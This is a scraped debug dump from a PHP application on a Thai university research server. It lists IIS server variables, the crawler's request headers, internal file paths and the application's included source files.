PSModulePathC:\Windows\system32\WindowsPowerShell\v1.0\Modules\;C:\Program Files\WindowsPowerShell\Modules\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ResourceManager\AzureResourceManager\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\ServiceManagement\;C:\Program Files (x86)\Microsoft SDKs\Azure\PowerShell\Storage\
PUBLICC:\Users\Public
SystemDriveC:
SystemRootC:\Windows
TEMPC:\Windows\TEMP
TMPC:\Windows\TEMP
USERDOMAINWORKGROUP
USERNAMERMS$
USERPROFILEC:\Windows\system32\config\systemprofile
VBOX_MSI_INSTALL_PATHC:\Program Files\Oracle\VirtualBox\
VS140COMNTOOLSC:\Program Files (x86)\Microsoft Visual Studio 14.0\Common7\Tools\
windirC:\Windows
ORIG_PATH_INFO/rdiqa/public/index.php
URL/rdiqa/public/index.php
SERVER_SOFTWAREMicrosoft-IIS/8.5
SERVER_PROTOCOLHTTP/1.1
SERVER_PORT_SECURE0
SERVER_PORT82
SERVER_NAMErms.rdi.tsu.ac.th
SCRIPT_NAME/rdiqa/public/index.php
SCRIPT_FILENAMEC:\inetpub\wwwroot\rdiqa\public\index.php
REQUEST_URI/rdiqa/projectreport/index
REQUEST_METHODGET
REMOTE_USER
REMOTE_PORT34572
REMOTE_HOST44.201.99.222
REMOTE_ADDR44.201.99.222
QUERY_STRING_url=/projectreport/index
PATH_TRANSLATEDC:\inetpub\wwwroot\rdiqa\public\index.php
LOGON_USER
LOCAL_ADDR10.100.1.209
INSTANCE_META_PATH/LM/W3SVC/1
INSTANCE_NAMERMS.RDI.TSU.AC.TH
INSTANCE_ID1
HTTPS_SERVER_SUBJECT
HTTPS_SERVER_ISSUER
HTTPS_SECRETKEYSIZE
HTTPS_KEYSIZE
HTTPSoff
GATEWAY_INTERFACECGI/1.1
DOCUMENT_ROOTC:\inetpub\wwwroot
CONTENT_TYPE
CONTENT_LENGTH0
CERT_SUBJECT
CERT_SERIALNUMBER
CERT_ISSUER
CERT_FLAGS
CERT_COOKIE
AUTH_USER
AUTH_PASSWORD
AUTH_TYPE
APPL_PHYSICAL_PATHC:\inetpub\wwwroot\
APPL_MD_PATH/LM/W3SVC/1/ROOT
IIS_UrlRewriteModule7.1.1952.0
UNENCODED_URL/rdiqa/projectreport/index
IIS_WasUrlRewritten1
HTTP_X_ORIGINAL_URL/rdiqa/projectreport/index
HTTP_USER_AGENTCCBot/2.0 (https://commoncrawl.org/faq/)
HTTP_IF_MODIFIED_SINCESat, 02 Jul 2022 19:32:07 GMT
HTTP_HOSTrms.rdi.tsu.ac.th:82
HTTP_ACCEPT_LANGUAGEen-US,en;q=0.5
HTTP_ACCEPT_ENCODINGbr,gzip
HTTP_ACCEPTtext/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_CONTENT_LENGTH0
HTTP_CONNECTIONKeep-Alive
FCGI_ROLERESPONDER
PHP_SELF/rdiqa/public/index.php
REQUEST_TIME_FLOAT1670476271.3157
REQUEST_TIME1670476271
#Path
0C:\inetpub\wwwroot\rdiqa\public\index.php
1C:\inetpub\wwwroot\rdiqa\app\config\loader.php
2C:\inetpub\wwwroot\rdiqa\app\Services.php
3C:\inetpub\wwwroot\rdiqa\app\library\Base\Services.php
4C:\inetpub\wwwroot\rdiqa\app\plugins\SecurityPlugin.php
5C:\inetpub\wwwroot\rdiqa\app\plugins\NotFoundPlugin.php
6C:\inetpub\wwwroot\rdiqa\app\controllers\ProjectreportController.php
7C:\inetpub\wwwroot\rdiqa\app\controllers\ControllerBase.php
8C:\inetpub\wwwroot\rdiqa\app\forms\MprojectForm.php
9C:\inetpub\wwwroot\rdiqa\app\models\Department.php
10C:\inetpub\wwwroot\rdiqa\app\models\Budgetyear.php
11C:\inetpub\wwwroot\rdiqa\app\models\Project.php
12C:\inetpub\wwwroot\rdiqa\app\models\Sumfundtype.php
13C:\inetpub\wwwroot\rdiqa\app\models\Fundtype.php
14C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_projectreport_index.volt.php
15C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_projectreport.volt.php
16C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_layouts_main.volt.php
17C:\inetpub\wwwroot\rdiqa\app\library\Elementsrdi.php
18C:\inetpub\wwwroot\rdiqa\cache\volt\c__inetpub_wwwroot_rdiqa_app_views_index.volt.php
Memory
Usage4194304